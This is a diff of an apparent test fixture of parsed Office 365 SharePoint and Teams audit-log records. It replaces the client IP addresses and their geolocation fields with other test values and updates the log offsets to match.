@@ -856,11 +846,11 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "sharepoint", "input.type": "log", - "log.offset": 11743, + "log.offset": 11733, "network.type": "ipv4", "o365.audit.ApplicationDisplayName": "OneNote", "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", - "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", "o365.audit.CreationTime": "2021-02-05T09:08:17", "o365.audit.DoNotDistributeEvent": true, @@ -890,20 +880,18 @@ "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", "o365.audit.Workload": "SharePoint", "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", - "related.ip": "51.141.50.227", + "related.ip": "175.16.199.1", "related.user": "app", "service.type": "o365", - "source.as.number": 8075, - "source.as.organization.name": "Microsoft Corporation", - "source.geo.city_name": "Cardiff", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "GB", - "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.4975, - "source.geo.location.lon": -3.2004, - "source.geo.region_iso_code": "GB-CRF", - "source.geo.region_name": "Cardiff", - "source.ip": "51.141.50.227", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -917,8 +905,8 @@ }, { "@timestamp": "2021-02-05T09:08:17.000Z", - "client.address": "51.141.50.227", - "client.ip": "51.141.50.227", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "ListColumnUpdated", "event.category": "web", "event.code": "SharePointFieldOperation", 
@@ -933,11 +921,11 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "sharepoint", "input.type": "log", - "log.offset": 12834, + "log.offset": 12823, "network.type": "ipv4", "o365.audit.ApplicationDisplayName": "OneNote", "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", - "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", "o365.audit.CreationTime": "2021-02-05T09:08:17", "o365.audit.DoNotDistributeEvent": true, @@ -967,20 +955,18 @@ "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", "o365.audit.Workload": "SharePoint", "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", - "related.ip": "51.141.50.227", + "related.ip": "175.16.199.1", "related.user": "app", "service.type": "o365", - "source.as.number": 8075, - "source.as.organization.name": "Microsoft Corporation", - "source.geo.city_name": "Cardiff", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "GB", - "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.4975, - "source.geo.location.lon": -3.2004, - "source.geo.region_iso_code": "GB-CRF", - "source.geo.region_name": "Cardiff", - "source.ip": "51.141.50.227", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -994,8 +980,8 @@ }, { "@timestamp": "2021-02-05T09:08:17.000Z", - "client.address": "51.141.50.227", - "client.ip": "51.141.50.227", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "ListColumnUpdated", "event.category": "web", "event.code": "SharePointFieldOperation", 
@@ -1010,11 +996,11 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "sharepoint", "input.type": "log", - "log.offset": 13925, + "log.offset": 13913, "network.type": "ipv4", "o365.audit.ApplicationDisplayName": "OneNote", "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", - "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", "o365.audit.CreationTime": "2021-02-05T09:08:17", "o365.audit.DoNotDistributeEvent": true, @@ -1044,20 +1030,18 @@ "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", "o365.audit.Workload": "SharePoint", "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", - "related.ip": "51.141.50.227", + "related.ip": "175.16.199.1", "related.user": "app", "service.type": "o365", - "source.as.number": 8075, - "source.as.organization.name": "Microsoft Corporation", - "source.geo.city_name": "Cardiff", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "GB", - "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.4975, - "source.geo.location.lon": -3.2004, - "source.geo.region_iso_code": "GB-CRF", - "source.geo.region_name": "Cardiff", - "source.ip": "51.141.50.227", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -1071,8 +1055,8 @@ }, { "@timestamp": "2021-02-05T09:08:17.000Z", - "client.address": "51.141.50.227", - "client.ip": "51.141.50.227", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "ListColumnUpdated", "event.category": "web", "event.code": "SharePointFieldOperation", 
@@ -1087,11 +1071,11 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "sharepoint",
 "input.type": "log",
- "log.offset": 15016,
+ "log.offset": 15003,
 "network.type": "ipv4",
 "o365.audit.ApplicationDisplayName": "OneNote",
 "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
- "o365.audit.ClientIP": "51.141.50.227",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
 "o365.audit.CreationTime": "2021-02-05T09:08:17",
 "o365.audit.DoNotDistributeEvent": true,
@@ -1121,20 +1105,18 @@
 "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
 "o365.audit.Workload": "SharePoint",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "51.141.50.227",
+ "related.ip": "175.16.199.1",
 "related.user": "app",
 "service.type": "o365",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
- "source.geo.city_name": "Cardiff",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "GB",
- "source.geo.country_name": "United Kingdom",
- "source.geo.location.lat": 51.4975,
- "source.geo.location.lon": -3.2004,
- "source.geo.region_iso_code": "GB-CRF",
- "source.geo.region_name": "Cardiff",
- "source.ip": "51.141.50.227",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -1148,8 +1130,8 @@
 },
 {
 "@timestamp": "2021-02-05T09:08:17.000Z",
- "client.address": "51.141.50.227",
- "client.ip": "51.141.50.227",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "ListColumnUpdated",
 "event.category": "web",
 "event.code": "SharePointFieldOperation",
@@ -1164,11 +1146,11 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "sharepoint",
 "input.type": "log",
- "log.offset": 16107,
+ "log.offset": 16093,
 "network.type": "ipv4",
 "o365.audit.ApplicationDisplayName": "OneNote",
 "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
- "o365.audit.ClientIP": "51.141.50.227",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
 "o365.audit.CreationTime": "2021-02-05T09:08:17",
 "o365.audit.DoNotDistributeEvent": true,
@@ -1198,20 +1180,18 @@
 "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
 "o365.audit.Workload": "SharePoint",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "51.141.50.227",
+ "related.ip": "175.16.199.1",
 "related.user": "app",
 "service.type": "o365",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
- "source.geo.city_name": "Cardiff",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "GB",
- "source.geo.country_name": "United Kingdom",
- "source.geo.location.lat": 51.4975,
- "source.geo.location.lon": -3.2004,
- "source.geo.region_iso_code": "GB-CRF",
- "source.geo.region_name": "Cardiff",
- "source.ip": "51.141.50.227",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -1225,8 +1205,8 @@
 },
 {
 "@timestamp": "2021-02-05T09:08:17.000Z",
- "client.address": "51.141.50.227",
- "client.ip": "51.141.50.227",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "ListColumnUpdated",
 "event.category": "web",
 "event.code": "SharePointFieldOperation",
@@ -1241,11 +1221,11 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "sharepoint",
 "input.type": "log",
- "log.offset": 17198,
+ "log.offset": 17183,
 "network.type": "ipv4",
 "o365.audit.ApplicationDisplayName": "OneNote",
 "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
- "o365.audit.ClientIP": "51.141.50.227",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
 "o365.audit.CreationTime": "2021-02-05T09:08:17",
 "o365.audit.DoNotDistributeEvent": true,
@@ -1275,20 +1255,18 @@
 "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
 "o365.audit.Workload": "SharePoint",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "51.141.50.227",
+ "related.ip": "175.16.199.1",
 "related.user": "app",
 "service.type": "o365",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
- "source.geo.city_name": "Cardiff",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "GB",
- "source.geo.country_name": "United Kingdom",
- "source.geo.location.lat": 51.4975,
- "source.geo.location.lon": -3.2004,
- "source.geo.region_iso_code": "GB-CRF",
- "source.geo.region_name": "Cardiff",
- "source.ip": "51.141.50.227",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -1320,7 +1298,7 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "testsiem4.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 18289,
+ "log.offset": 18273,
 "o365.audit.CreationTime": "2021-02-05T09:08:00",
 "o365.audit.Id": "9b9e973b-64c3-4607-bc79-bf743c985051",
 "o365.audit.Operation": "TeamCreated",
@@ -1363,7 +1341,7 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "testsiem4.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 18695,
+ "log.offset": 18679,
 "o365.audit.AADGroupId": "61b6d6f5-7aa0-437b-a967-fbcd39ec90a1",
 "o365.audit.CommunicationType": "Team",
 "o365.audit.CreationTime": "2021-02-05T09:07:58",
@@ -1408,8 +1386,8 @@
 },
 {
 "@timestamp": "2021-02-05T09:08:13.000Z",
- "client.address": "52.114.88.180",
- "client.ip": "52.114.88.180",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "ListColumnUpdated",
 "event.category": "web",
 "event.code": "SharePointFieldOperation",
@@ -1424,11 +1402,11 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "testsiem4.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 19362,
+ "log.offset": 19346,
 "network.type": "ipv4",
 "o365.audit.ApplicationDisplayName": "Microsoft Teams Services",
 "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe",
- "o365.audit.ClientIP": "52.114.88.180",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CorrelationId": "fc39a89f-5054-2000-9ced-83aa1cf560fd",
 "o365.audit.CreationTime": "2021-02-05T09:08:13",
 "o365.audit.DoNotDistributeEvent": true,
@@ -1458,20 +1436,18 @@
 "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
 "o365.audit.Workload": "SharePoint",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "52.114.88.180",
+ "related.ip": "81.2.69.143",
 "related.user": "root",
 "service.type": "o365",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
 "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
 "source.geo.country_iso_code": "GB",
 "source.geo.country_name": "United Kingdom",
- "source.geo.location.lat": 51.5132,
- "source.geo.location.lon": -0.0961,
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
 "source.geo.region_iso_code": "GB-ENG",
 "source.geo.region_name": "England",
- "source.ip": "52.114.88.180",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -1485,8 +1461,8 @@
 },
 {
 "@timestamp": "2021-02-05T09:08:12.000Z",
- "client.address": "52.114.88.180",
- "client.ip": "52.114.88.180",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "FolderCreated",
 "event.category": "file",
 "event.code": "SharePointFileOperation",
@@ -1504,11 +1480,11 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "testsiem4.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 20481,
+ "log.offset": 20463,
 "network.type": "ipv4",
 "o365.audit.ApplicationDisplayName": "Microsoft Teams Services",
 "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe",
- "o365.audit.ClientIP": "52.114.88.180",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CorrelationId": "fc39a89f-b01b-2000-9ced-879789d2d8e5",
 "o365.audit.CreationTime": "2021-02-05T09:08:12",
 "o365.audit.EventSource": "SharePoint",
@@ -1533,20 +1509,18 @@
 "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
 "o365.audit.Workload": "SharePoint",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "52.114.88.180",
+ "related.ip": "81.2.69.143",
 "related.user": "root",
 "service.type": "o365",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
 "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
 "source.geo.country_iso_code": "GB",
 "source.geo.country_name": "United Kingdom",
- "source.geo.location.lat": 51.5132,
- "source.geo.location.lon": -0.0961,
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
 "source.geo.region_iso_code": "GB-ENG",
 "source.geo.region_name": "England",
- "source.ip": "52.114.88.180",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -1578,7 +1552,7 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "sharepoint",
 "input.type": "log",
- "log.offset": 21523,
+ "log.offset": 21503,
 "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
 "o365.audit.CreationTime": "2021-02-05T09:07:57",
 "o365.audit.EventData": "Site Members",
@@ -1630,7 +1604,7 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "sharepoint",
 "input.type": "log",
- "log.offset": 22335,
+ "log.offset": 22315,
 "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
 "o365.audit.CreationTime": "2021-02-05T09:07:56",
 "o365.audit.EventData": "Site Owners",
@@ -1682,7 +1656,7 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "sharepoint",
 "input.type": "log",
- "log.offset": 23127,
+ "log.offset": 23107,
 "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
 "o365.audit.CreationTime": "2021-02-05T09:07:56",
 "o365.audit.EventData": "Site Owners",
@@ -1734,7 +1708,7 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "sharepoint",
 "input.type": "log",
- "log.offset": 23920,
+ "log.offset": 23900,
 "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
 "o365.audit.CreationTime": "2021-02-05T09:07:56",
 "o365.audit.EventData": "Site Members",
@@ -1786,7 +1760,7 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "sharepoint",
 "input.type": "log",
- "log.offset": 24715,
+ "log.offset": 24695,
 "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
 "o365.audit.CreationTime": "2021-02-05T09:07:56",
 "o365.audit.EventData": "Site Owners",
@@ -1824,8 +1798,8 @@
 },
 {
 "@timestamp": "2021-02-05T09:07:56.000Z",
- "client.address": "20.190.143.50",
- "client.ip": "20.190.143.50",
+ "client.address": "81.2.69.193",
+ "client.ip": "81.2.69.193",
 "event.action": "SiteCollectionCreated",
 "event.category": "web",
 "event.code": "SharePoint",
@@ -1840,11 +1814,11 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "sharepoint",
 "input.type": "log",
- "log.offset": 25507,
+ "log.offset": 25487,
 "network.type": "ipv4",
 "o365.audit.ApplicationDisplayName": "Microsoft Graph",
 "o365.audit.ApplicationId": "00000006-0000-0ff1-ce00-000000000000",
- "o365.audit.ClientIP": "20.190.143.50",
+ "o365.audit.ClientIP": "81.2.69.193",
 "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
 "o365.audit.CreationTime": "2021-02-05T09:07:56",
 "o365.audit.EventData": "O365AdminCenterTrueFalse",
@@ -1863,20 +1837,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "SharePoint",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "20.190.143.50",
+ "related.ip": "81.2.69.193",
 "related.user": "app",
 "service.type": "o365",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
 "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
 "source.geo.country_iso_code": "GB",
 "source.geo.country_name": "United Kingdom",
- "source.geo.location.lat": 51.5132,
- "source.geo.location.lon": -0.0961,
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
 "source.geo.region_iso_code": "GB-ENG",
 "source.geo.region_name": "England",
- "source.ip": "20.190.143.50",
+ "source.ip": "81.2.69.193",
 "tags": [
 "forwarded"
 ],
@@ -1904,7 +1876,7 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "sharepoint",
 "input.type": "log",
- "log.offset": 26436,
+ "log.offset": 26414,
 "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
 "o365.audit.CreationTime": "2021-02-05T09:07:56",
 "o365.audit.EventData": "Site Owners",
@@ -1956,7 +1928,7 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "sharepoint",
 "input.type": "log",
- "log.offset": 27229,
+ "log.offset": 27207,
 "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
 "o365.audit.CreationTime": "2021-02-05T09:07:55",
 "o365.audit.EventData": "Site Owners",
@@ -1994,8 +1966,8 @@
 },
 {
 "@timestamp": "2021-02-05T09:08:14.000Z",
- "client.address": "52.114.88.180",
- "client.ip": "52.114.88.180",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "ListUpdated",
 "event.category": "web",
 "event.code": "SharePointListOperation",
@@ -2010,11 +1982,11 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "testsiem4.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 28021,
+ "log.offset": 27999,
 "network.type": "ipv4",
 "o365.audit.ApplicationDisplayName": "Microsoft Teams Services",
 "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe",
- "o365.audit.ClientIP": "52.114.88.180",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CorrelationId": "fc39a89f-4077-2000-7abb-cbd546e4157d",
 "o365.audit.CreationTime": "2021-02-05T09:08:14",
 "o365.audit.DoNotDistributeEvent": true,
@@ -2044,20 +2016,18 @@
 "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
 "o365.audit.Workload": "SharePoint",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "52.114.88.180",
+ "related.ip": "81.2.69.143",
 "related.user": "root",
 "service.type": "o365",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
 "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
 "source.geo.country_iso_code": "GB",
 "source.geo.country_name": "United Kingdom",
- "source.geo.location.lat": 51.5132,
- "source.geo.location.lon": -0.0961,
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
 "source.geo.region_iso_code": "GB-ENG",
 "source.geo.region_name": "England",
- "source.ip": "52.114.88.180",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -2071,8 +2041,8 @@
 },
 {
 "@timestamp": "2021-02-05T09:08:14.000Z",
- "client.address": "52.114.88.180",
- "client.ip": "52.114.88.180",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "ListCreated",
 "event.category": "web",
 "event.code": "SharePointListOperation",
@@ -2087,11 +2057,11 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "testsiem4.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 29095,
+ "log.offset": 29071,
 "network.type": "ipv4",
 "o365.audit.ApplicationDisplayName": "Microsoft Teams Services",
 "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe",
- "o365.audit.ClientIP": "52.114.88.180",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CorrelationId": "fc39a89f-4077-2000-7abb-cbd546e4157d",
 "o365.audit.CreationTime": "2021-02-05T09:08:14",
 "o365.audit.EventSource": "SharePoint",
@@ -2114,20 +2084,18 @@
 "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
 "o365.audit.Workload": "SharePoint",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "52.114.88.180",
+ "related.ip": "81.2.69.143",
 "related.user": "root",
 "service.type": "o365",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
 "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
 "source.geo.country_iso_code": "GB",
 "source.geo.country_name": "United Kingdom",
- "source.geo.location.lat": 51.5132,
- "source.geo.location.lon": -0.0961,
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
 "source.geo.region_iso_code": "GB-ENG",
 "source.geo.region_name": "England",
- "source.ip": "52.114.88.180",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -2141,8 +2109,8 @@
 },
 {
 "@timestamp": "2021-02-05T09:08:17.000Z",
- "client.address": "51.141.50.227",
- "client.ip": "51.141.50.227",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "ListColumnUpdated",
 "event.category": "web",
 "event.code": "SharePointFieldOperation",
@@ -2157,11 +2125,11 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "sharepoint",
 "input.type": "log",
- "log.offset": 30032,
+ "log.offset": 30006,
 "network.type": "ipv4",
 "o365.audit.ApplicationDisplayName": "OneNote",
 "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
- "o365.audit.ClientIP": "51.141.50.227",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
 "o365.audit.CreationTime": "2021-02-05T09:08:17",
 "o365.audit.DoNotDistributeEvent": true,
@@ -2191,20 +2159,18 @@
 "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
 "o365.audit.Workload": "SharePoint",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "51.141.50.227",
+ "related.ip": "175.16.199.1",
 "related.user": "app",
 "service.type": "o365",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
- "source.geo.city_name": "Cardiff",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "GB",
- "source.geo.country_name": "United Kingdom",
- "source.geo.location.lat": 51.4975,
- "source.geo.location.lon": -3.2004,
- "source.geo.region_iso_code": "GB-CRF",
- "source.geo.region_name": "Cardiff",
- "source.ip": "51.141.50.227",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -2218,8 +2184,8 @@
 },
 {
 "@timestamp": "2021-02-05T09:08:17.000Z",
- "client.address": "51.141.50.227",
- "client.ip": "51.141.50.227",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "ListColumnUpdated",
 "event.category": "web",
 "event.code": "SharePointFieldOperation",
@@ -2234,11 +2200,11 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "sharepoint",
 "input.type": "log",
- "log.offset": 31123,
+ "log.offset": 31096,
 "network.type": "ipv4",
 "o365.audit.ApplicationDisplayName": "OneNote",
 "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
- "o365.audit.ClientIP": "51.141.50.227",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
 "o365.audit.CreationTime": "2021-02-05T09:08:17",
 "o365.audit.DoNotDistributeEvent": true,
@@ -2268,20 +2234,18 @@
 "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
 "o365.audit.Workload": "SharePoint",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "51.141.50.227",
+ "related.ip": "175.16.199.1",
 "related.user": "app",
 "service.type": "o365",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
- "source.geo.city_name": "Cardiff",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "GB",
- "source.geo.country_name": "United Kingdom",
- "source.geo.location.lat": 51.4975,
- "source.geo.location.lon": -3.2004,
- "source.geo.region_iso_code": "GB-CRF",
- "source.geo.region_name": "Cardiff",
- "source.ip": "51.141.50.227",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -2295,8 +2259,8 @@
 },
 {
 "@timestamp": "2021-02-05T09:08:17.000Z",
- "client.address": "51.141.50.227",
- "client.ip": "51.141.50.227",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "ListColumnUpdated",
 "event.category": "web",
 "event.code": "SharePointFieldOperation",
@@ -2311,11 +2275,11 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "sharepoint",
 "input.type": "log",
- "log.offset": 32214,
+ "log.offset": 32186,
 "network.type": "ipv4",
 "o365.audit.ApplicationDisplayName": "OneNote",
 "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
- "o365.audit.ClientIP": "51.141.50.227",
+ "o365.audit.ClientIP": "175.16.199.1",
